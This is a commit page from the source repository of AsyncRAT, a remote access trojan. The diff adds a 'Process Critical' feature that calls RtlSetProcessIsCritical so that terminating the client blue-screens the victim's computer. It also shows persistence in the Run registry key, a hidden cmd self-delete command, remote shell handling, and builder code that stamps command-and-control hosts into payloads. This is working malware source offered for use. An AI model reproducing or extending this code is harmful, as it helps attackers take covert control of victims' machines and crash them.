Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update

Browse Source 
-Added process critical - thanks to MrDevBot
-Add a method to handle client's exit
-Minor bugs fixed
This commit is contained in:
NYAN CAT 2019-05-20 18:34:33 +03:00
parent 4626e891b1
commit 1846a77b5a
13 changed files with 120 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
View File

File diff suppressed because one or more lines are too long

36
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs generated
View File

@ -46,6 +46,7 @@ namespace AsyncRAT_Sharp.Forms
this.label3 = new System.Windows.Forms.Label(); this.label3 = new System.Windows.Forms.Label();
this.label4 = new System.Windows.Forms.Label(); this.label4 = new System.Windows.Forms.Label();
this.groupBox3 = new System.Windows.Forms.GroupBox(); this.groupBox3 = new System.Windows.Forms.GroupBox();
this.chkBdos = new System.Windows.Forms.CheckBox();
this.txtMutex = new System.Windows.Forms.TextBox(); this.txtMutex = new System.Windows.Forms.TextBox();
this.label5 = new System.Windows.Forms.Label(); this.label5 = new System.Windows.Forms.Label();
this.chkAnti = new System.Windows.Forms.CheckBox(); this.chkAnti = new System.Windows.Forms.CheckBox();
@ -54,6 +55,7 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage1 = new System.Windows.Forms.TabPage(); this.tabPage1 = new System.Windows.Forms.TabPage();
this.tabPage2 = new System.Windows.Forms.TabPage(); this.tabPage2 = new System.Windows.Forms.TabPage();
this.tabPage3 = new System.Windows.Forms.TabPage(); this.tabPage3 = new System.Windows.Forms.TabPage();
this.pictureBox1 = new System.Windows.Forms.PictureBox();
this.groupBox1.SuspendLayout(); this.groupBox1.SuspendLayout();
this.groupBox2.SuspendLayout(); this.groupBox2.SuspendLayout();
this.groupBox3.SuspendLayout(); this.groupBox3.SuspendLayout();
@ -61,11 +63,12 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage1.SuspendLayout(); this.tabPage1.SuspendLayout();
this.tabPage2.SuspendLayout(); this.tabPage2.SuspendLayout();
this.tabPage3.SuspendLayout(); this.tabPage3.SuspendLayout();
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
this.SuspendLayout(); this.SuspendLayout();
// //
// button1 // button1
// //
this.button1.Location = new System.Drawing.Point(6, 236); this.button1.Location = new System.Drawing.Point(3, 302);
this.button1.Name = "button1"; this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(440, 49); this.button1.Size = new System.Drawing.Size(440, 49);
this.button1.TabIndex = 0; this.button1.TabIndex = 0;
@ -225,20 +228,32 @@ namespace AsyncRAT_Sharp.Forms
// //
// groupBox3 // groupBox3
// //
this.groupBox3.Controls.Add(this.pictureBox1);
this.groupBox3.Controls.Add(this.chkBdos);
this.groupBox3.Controls.Add(this.txtMutex); this.groupBox3.Controls.Add(this.txtMutex);
this.groupBox3.Controls.Add(this.label5); this.groupBox3.Controls.Add(this.label5);
this.groupBox3.Controls.Add(this.chkAnti); this.groupBox3.Controls.Add(this.chkAnti);
this.groupBox3.Location = new System.Drawing.Point(6, 17); this.groupBox3.Location = new System.Drawing.Point(6, 17);
this.groupBox3.Name = "groupBox3"; this.groupBox3.Name = "groupBox3";
this.groupBox3.Size = new System.Drawing.Size(440, 174); this.groupBox3.Size = new System.Drawing.Size(440, 229);
this.groupBox3.TabIndex = 9; this.groupBox3.TabIndex = 9;
this.groupBox3.TabStop = false; this.groupBox3.TabStop = false;
this.groupBox3.Text = "MISC"; this.groupBox3.Text = "MISC";
// //
// chkBdos
//
this.chkBdos.AutoSize = true;
this.chkBdos.Location = new System.Drawing.Point(21, 82);
this.chkBdos.Name = "chkBdos";
this.chkBdos.Size = new System.Drawing.Size(143, 24);
this.chkBdos.TabIndex = 12;
this.chkBdos.Text = "Process Critical";
this.chkBdos.UseVisualStyleBackColor = true;
//
// txtMutex // txtMutex
// //
this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtMutex.Location = new System.Drawing.Point(106, 98); this.txtMutex.Location = new System.Drawing.Point(106, 165);
this.txtMutex.Name = "txtMutex"; this.txtMutex.Name = "txtMutex";
this.txtMutex.Size = new System.Drawing.Size(271, 26); this.txtMutex.Size = new System.Drawing.Size(271, 26);
this.txtMutex.TabIndex = 11; this.txtMutex.TabIndex = 11;
@ -247,7 +262,7 @@ namespace AsyncRAT_Sharp.Forms
// label5 // label5
// //
this.label5.AutoSize = true; this.label5.AutoSize = true;
this.label5.Location = new System.Drawing.Point(14, 102); this.label5.Location = new System.Drawing.Point(14, 169);
this.label5.Name = "label5"; this.label5.Name = "label5";
this.label5.Size = new System.Drawing.Size(52, 20); this.label5.Size = new System.Drawing.Size(52, 20);
this.label5.TabIndex = 10; this.label5.TabIndex = 10;
@ -308,6 +323,16 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage3.Text = "Misc"; this.tabPage3.Text = "Misc";
this.tabPage3.UseVisualStyleBackColor = true; this.tabPage3.UseVisualStyleBackColor = true;
// //
// pictureBox1
//
this.pictureBox1.Image = global::AsyncRAT_Sharp.Properties.Resources.uac;
this.pictureBox1.Location = new System.Drawing.Point(181, 74);
this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new System.Drawing.Size(32, 32);
this.pictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.AutoSize;
this.pictureBox1.TabIndex = 13;
this.pictureBox1.TabStop = false;
//
// FormBuilder // FormBuilder
// //
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
@ -329,6 +354,7 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage1.ResumeLayout(false); this.tabPage1.ResumeLayout(false);
this.tabPage2.ResumeLayout(false); this.tabPage2.ResumeLayout(false);
this.tabPage3.ResumeLayout(false); this.tabPage3.ResumeLayout(false);
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
this.ResumeLayout(false); this.ResumeLayout(false);
} }
@ -359,5 +385,7 @@ namespace AsyncRAT_Sharp.Forms
private System.Windows.Forms.TabPage tabPage1; private System.Windows.Forms.TabPage tabPage1;
private System.Windows.Forms.TabPage tabPage2; private System.Windows.Forms.TabPage tabPage2;
private System.Windows.Forms.TabPage tabPage3; private System.Windows.Forms.TabPage tabPage3;
private System.Windows.Forms.CheckBox chkBdos;
private System.Windows.Forms.PictureBox pictureBox1;
} }
} }

5
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs
View File

@ -147,6 +147,9 @@ namespace AsyncRAT_Sharp.Forms
if (operand == "%Serversignature%") if (operand == "%Serversignature%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature)); methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature));
if (operand == "%BDOS%")
methodDef.Body.Instructions[i].Operand = chkBdos.Checked.ToString().ToLower();
if (operand == "%Pastebin%") if (operand == "%Pastebin%")
if (chkPastebin.Checked) if (chkPastebin.Checked)
methodDef.Body.Instructions[i].Operand = aes.Encrypt(txtPastebin.Text); methodDef.Body.Instructions[i].Operand = aes.Encrypt(txtPastebin.Text);
@ -158,7 +161,7 @@ namespace AsyncRAT_Sharp.Forms
} }
} }
} }
} }
private void CheckBox2_CheckedChanged(object sender, EventArgs e) private void CheckBox2_CheckedChanged(object sender, EventArgs e)

2
AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
View File

@ -16,6 +16,6 @@ namespace AsyncRAT_Sharp
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12"; public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate; public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.4.8B"; public static readonly string Version = "AsyncRAT 0.4.8C";
} }
} }

1
AsyncRAT-C#/Client/Client.csproj
View File

@ -105,6 +105,7 @@
<DependentUpon>FormChat.cs</DependentUpon> <DependentUpon>FormChat.cs</DependentUpon>
</Compile> </Compile>
<Compile Include="Helper\Methods.cs" /> <Compile Include="Helper\Methods.cs" />
<Compile Include="Helper\ProcessCritical.cs" />
<Compile Include="Install\NormalStartup.cs" /> <Compile Include="Install\NormalStartup.cs" />
<Compile Include="MessagePack\BytesTools.cs" /> <Compile Include="MessagePack\BytesTools.cs" />
<Compile Include="MessagePack\MsgPack.cs" /> <Compile Include="MessagePack\MsgPack.cs" />

6
AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs
View File

@ -1,4 +1,5 @@
using Microsoft.Win32; using Client.Helper;
using Microsoft.Win32;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.Diagnostics; using System.Diagnostics;
@ -6,6 +7,7 @@ using System.IO;
using System.Linq; using System.Linq;
using System.Security.Principal; using System.Security.Principal;
using System.Text; using System.Text;
using System.Windows.Forms;
namespace Client.Handle_Packet namespace Client.Handle_Packet
{ {
@ -28,7 +30,7 @@ namespace Client.Handle_Packet
} }
}; };
proc.Start(); proc.Start();
Environment.Exit(0); Methods.ClientExit();
} }
catch { } catch { }
} }

43
AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs
View File

@ -10,14 +10,14 @@ using System.Text;
namespace Client.Handle_Packet namespace Client.Handle_Packet
{ {
public class HandleUninstall public class HandleUninstall
{ {
public HandleUninstall() public HandleUninstall()
{ {
if (Convert.ToBoolean(Settings.Install)) if (Convert.ToBoolean(Settings.Install))
{
try
{ {
try
{
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath)); Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath));
else else
@ -34,25 +34,24 @@ namespace Client.Handle_Packet
} }
} }
catch { } catch { }
} }
ProcessStartInfo Del = null; ProcessStartInfo Del = null;
try try
{
Del = new ProcessStartInfo()
{ {
Del = new ProcessStartInfo() Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
{ WindowStyle = ProcessWindowStyle.Hidden,
Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"", CreateNoWindow = true,
WindowStyle = ProcessWindowStyle.Hidden, FileName = "cmd.exe"
CreateNoWindow = true, };
FileName = "cmd.exe" }
}; catch { }
} finally
catch { } {
finally Process.Start(Del);
{ Methods.ClientExit();
Methods.CloseMutex(); }
Process.Start(Del);
Environment.Exit(0);
}
} }
} }
} }

6
AsyncRAT-C#/Client/Handle Packet/Packet.cs
View File

@ -85,7 +85,7 @@ namespace Client.Handle_Packet
ClientSocket.Client.Dispose(); ClientSocket.Client.Dispose();
} }
catch { } catch { }
Environment.Exit(0); Methods.ClientExit();
break; break;
} }
@ -98,7 +98,7 @@ namespace Client.Handle_Packet
} }
catch { } catch { }
Process.Start(Application.ExecutablePath); Process.Start(Application.ExecutablePath);
Environment.Exit(0); Methods.ClientExit();
break; break;
} }
@ -270,7 +270,7 @@ namespace Client.Handle_Packet
case "shellWriteInput": case "shellWriteInput":
{ {
if (HandleShell.ProcessShell != null) if (HandleShell.ProcessShell != null)
HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString); HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
break; break;
} }

8
AsyncRAT-C#/Client/Helper/Methods.cs
View File

@ -43,5 +43,13 @@ namespace Client.Helper
_appMutex = null; _appMutex = null;
} }
} }
public static void ClientExit()
{
if (Convert.ToBoolean(Settings.BDOS))
ProcessCritical.Exit();
CloseMutex();
Environment.Exit(0);
}
} }
} }

32
AsyncRAT-C#/Client/Helper/ProcessCritical.cs Normal file
View File

@ -0,0 +1,32 @@
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace Client.Helper
{
public static class ProcessCritical
{
public static void Set()
{
try
{
Process.EnterDebugMode();
RtlSetProcessIsCritical(1, 0, 0);
}
catch { }
}
public static void Exit()
{
try
{
RtlSetProcessIsCritical(0, 0, 0);
}
catch { }
}
#region "Native Methods"
[DllImport("ntdll.dll", SetLastError = true)]
private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
#endregion
}
}

3
AsyncRAT-C#/Client/Install/NormalStartup.cs
View File

@ -69,9 +69,8 @@ namespace Client.Install
WindowStyle = ProcessWindowStyle.Hidden WindowStyle = ProcessWindowStyle.Hidden
}); });
} }
Methods.CloseMutex();
Process.Start(Settings.ClientFullPath); Process.Start(Settings.ClientFullPath);
Environment.Exit(0); Methods.ClientExit();
} }
} }
catch (Exception ex) catch (Exception ex)

3
AsyncRAT-C#/Client/Program.cs
View File

@ -34,6 +34,9 @@ namespace Client
if (Convert.ToBoolean(Settings.Install)) if (Convert.ToBoolean(Settings.Install))
NormalStartup.Install(); NormalStartup.Install();
if (Convert.ToBoolean(Settings.BDOS))
ProcessCritical.Set();
#if DEBUG #if DEBUG
ClientSocket.InitializeClient(); ClientSocket.InitializeClient();
#else #else

7
AsyncRAT-C#/Client/Settings.cs
View File

@ -12,7 +12,7 @@ namespace Client
#if DEBUG #if DEBUG
public static string Ports = "6606"; public static string Ports = "6606";
public static string Hosts = "127.0.0.1"; public static string Hosts = "127.0.0.1";
public static string Version = "AsyncRAT 0.4.8d"; public static string Version = "AsyncRAT 0.4.9C";
public static string Install = "false"; public static string Install = "false";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Key = "NYAN CAT"; public static string Key = "NYAN CAT";
@ -23,10 +23,12 @@ namespace Client
public static string Anti = "false"; public static string Anti = "false";
public static Aes256 aes256 = new Aes256(Key); public static Aes256 aes256 = new Aes256(Key);
public static string Pastebin = "null"; public static string Pastebin = "null";
public static string BDOS = "false";
#else #else
public static string Ports = "%Ports%"; public static string Ports = "%Ports%";
public static string Hosts = "%Hosts%"; public static string Hosts = "%Hosts%";
public static string Version = "AsyncRAT 0.4.9B"; public static string Version = "AsyncRAT 0.4.9C";
public static string Install = "%Install%"; public static string Install = "%Install%";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%"); public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%");
public static string Key = "%Key%"; public static string Key = "%Key%";
@ -37,6 +39,7 @@ namespace Client
public static readonly string Anti = "%Anti%"; public static readonly string Anti = "%Anti%";
public static Aes256 aes256; public static Aes256 aes256;
public static string Pastebin = "%Pastebin%"; public static string Pastebin = "%Pastebin%";
public static string BDOS = "%BDOS%";
#endif #endif